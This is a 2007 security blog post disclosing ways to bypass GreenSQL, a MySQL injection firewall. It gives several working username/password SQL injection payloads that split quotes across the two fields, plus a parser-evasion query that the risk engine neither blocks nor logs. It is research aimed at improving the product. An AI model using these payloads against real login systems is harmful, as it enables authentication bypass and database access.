ush.it - a beautiful place

GreenSQL, a MySQL firewall, bypassed.

October 4, 2007 at 6:17 pm - Filed under Hacks, Language EN - 546 words, reading time ~1 minutes - Permalink - Comments

Today on the ml one of our pupils, remix, posted about GreenSQL, "an Open Source database firewall used to protect databases from SQL injection attacks". In other words something that stands to SQL as mod_security stands to HTTP.

But do you know a thing? Filters always have their appeal :) Five bypasses has been found but there are many many others since this software is at its early stages. After these first five the discussion has moved on other more general topics.

Wisec

User: admin' and IF(1,1,('1\
Password: )) and ('1

s4tan

User: aa' or substring('a\
Password: ,1,1) = ('a

ascii

User: aa' OR SHA('\
Password: ) = SHA('\' AND pwd=SHA(

User: admin' AND SHA('\
Password: ) = SHA('\' AND pwd=SHA(

User: admin' or version()='4
Password: CHANGE_ON_INSTALL

As like for other open source IDS/IPS products there is a page where to test injections (http://www.greensql.net/sql-injection-test/) and an administrative demo interface (http://demo.greensql.net/) to permit if needed a whitebox approach.

Anyway a good product, far from perfection and surely not mature but something that with the help of researchers, slackers and just curious can become more effective. The same process that is undergoing with the power of the community for http://php-ids.org/ (http://sla.ckers.org/forum/read.php?12,8085,page=1), a creature of Mario, Christian and Lars.

Stefano has found also an other vector that is infact a parser bug (eg: the parser makes assumption like " or ", " where ",
")or(", etc.) showing ways to bypass riskengine.cpp. His example was this query select`field`from`tab`where`user`='1'OR'359'!=@a; that is 100% valid but is not contemplated by the parser.

User: admin'OR@a!='1
Pass: test

Query: SELECT * FROM user WHERE name = 'admin'OR@a!='1' AND pwd=SHA('test')

The OR is not caught by the risk engine and the successful SQL injection is not even logged.

Our suggestions for the project are:

  • Make the test page callable by url (eg: ?user=XX&pass=XX) so people can post links on their forum, ml etc and make the filters consistent.
  • The administration panel, it has to be secure (we didn't checked that).
  • The listener part, written in C, has to be secure.
  • The parser has to be adherent to the one of MySQL.

I'm writing this article now because Stefano (wisec) has broken the listener in "alert.cpp", mad Stefano : ) And so we have to wait for the admins to revive the demo.

char tmp_q[2048];
mysql_real_escape_string(dbConn, tmp_q, query.c_str(), (unsigned long) query.length());
tmp_q[2047] = '\0';

You can imagine that here the goal it's not to make something Secure(TM) but damn hard do exploit. So, slackers, GreenSQL devs, are you listening? Let's stress it, it's Open Source ; )

Reed's Alert! Got something burning? Tell USH team.
THP USH Wisec DigitalBullets